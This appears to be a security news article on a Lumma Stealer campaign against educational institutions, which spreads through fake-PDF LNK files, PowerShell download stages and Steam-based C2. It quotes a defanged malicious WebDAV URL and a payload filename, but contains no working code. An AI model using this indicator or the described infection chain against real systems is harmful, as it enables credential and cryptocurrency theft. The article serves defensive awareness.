A recent cybersecurity investigation has uncovered a malicious campaign leveraging the Lumma Stealer malware, a potent information-stealing tool distributed through a Malware-as-a-Service (MaaS) model.
This campaign specifically targets educational institutions by exploiting their infrastructure to distribute weaponized LNK files disguised as PDF documents.
The attack not only compromises sensitive data but also demonstrates the increasing sophistication of cybercriminal tactics.
The Lumma Stealer campaign employs malicious LNK files masquerading as legitimate PDFs, such as school fee structures or academic materials.
These files are hosted on compromised WebDAV servers, such as “http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk.”
When unsuspecting users click on these files, they initiate a multi-stage infection process.
This begins with the execution of PowerShell commands to download additional payloads, ultimately deploying the Lumma Stealer malware on the victim’s system.
Once installed, Lumma Stealer targets sensitive information, including passwords, browser data, cryptocurrency wallets, and even specific file types like “wallet.txt” or “seed.txt.”
The stolen data is then exfiltrated to command-and-control (C2) servers. Notably, the malware employs advanced evasion techniques, such as leveraging Steam profiles for C2 communication.
By embedding decryption keys in Steam URLs and using Caesar cipher methods, the malware cloaks its operations within a trusted platform.
Educational Institutions: A Prime Target
Educational institutions have become attractive targets for cybercriminals due to their vast repositories of sensitive data and often less robust cybersecurity measures.
This campaign underscores how attackers exploit these vulnerabilities to infiltrate networks and distribute malware across industries like academia, healthcare, finance, and technology.
The reliance on remote learning and digital platforms has further expanded the attack surface, making schools particularly susceptible.
Technical Insights into the Attack
The infection chain begins with users downloading malicious LNK files disguised as PDFs.
These files execute PowerShell commands via legitimate Windows binaries like mshta.exe and wmic.exe, bypassing traditional security mechanisms.
The embedded scripts are obfuscated using techniques such as AES encryption and mathematical operations to evade detection.
The final payload Lumma Stealer is downloaded from remote servers and executed as “Kompass-4.1.2.exe.”
Once operational, Lumma Stealer scans for specific keywords in system directories to extract sensitive information.
According to CloudSek Report, it also communicates with multiple C2 domains to exfiltrate data.
If these domains are inaccessible, the malware defaults to using Steam profiles for stealthy communication.
The Lumma Stealer campaign highlights the growing sophistication of MaaS platforms that enable even novice threat actors to launch complex attacks.
Educational institutions must prioritize cybersecurity by implementing robust defenses, including endpoint detection systems, regular vulnerability assessments, and user awareness training to recognize phishing attempts.
As this campaign demonstrates, weaponized PDFs remain a highly effective vector for malware distribution.
Organizations across all sectors must remain vigilant against evolving threats that exploit trusted file formats and platforms to compromise sensitive information.
